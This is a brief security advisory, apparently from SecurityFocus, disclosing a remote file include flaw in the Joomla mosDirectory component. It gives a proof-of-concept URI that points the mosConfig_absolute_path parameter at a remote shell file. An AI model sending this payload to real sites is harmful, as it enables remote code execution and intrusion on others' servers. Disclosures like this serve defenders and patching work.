Joomla mosDirectory Component mosConfig_absolute_path Remote File Include Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URI is available:

http://www.example.com/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://shell.txt?


 

Privacy Statement
Copyright 2010, SecurityFocus